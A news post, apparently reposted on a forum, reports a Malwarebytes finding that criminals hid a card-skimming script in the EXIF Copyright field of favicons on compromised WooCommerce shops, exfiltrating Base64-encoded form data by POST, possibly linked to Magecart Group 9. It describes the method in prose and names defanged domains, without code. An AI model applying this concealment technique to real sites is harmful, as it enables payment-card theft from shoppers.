News Criminals hide web skimmers in image metadata


Jun 28, 2020
Reaction score
According to experts, the attacks may be carried out by members of the Magecart Group 9.


Specialists from the Malwarebytes company discovered a malicious campaign in which cybercriminals injected the skimming code into the favicon’s EXIF metadata (website icon) and secretly downloaded it to the pages of the compromised Internet shops.

On one of the unnamed compromised sites, the researchers found a copy of the source code of the skimmer and noticed that the usual favicon.ico file contains an embedded script inside the Copyright field.

According to experts, the web-skimmer was found in the EXIF metadata of the file, which was downloaded by compromised online stores along with the WooCommerce plugin for WordPress. Malicious code for downloading a dangerous image was added to a legitimate script on store sites. Specialists traced the malicious activity to the cddn [.] Site, from which the malicious favicon was downloaded. Cybercriminals used favicons identical to those in compromised stores, and the web-skimmer was loaded from the Copyright field in the image metadata using the <img> tag.

Like other tools of this kind, the skimmer stole the contents of input fields, including usernames, billing address, credit card information, etc. The skimmer encoded the stolen information in Base64, expanded the string and transmitted the data as an image file to a remote criminals server using a POST request. .

As the security researcher using the pseudonym @Affable Kraut suggests, the skimmer can be associated with the cybercriminal group Magecart Group 9. The domain (magentorates [.] Com) using this EXIF metadata skimming technique has the same Bulgarian hosting provider and has been registered for weeks after magerates [.] com, previously associated with Magecart Group 9.
Top Bottom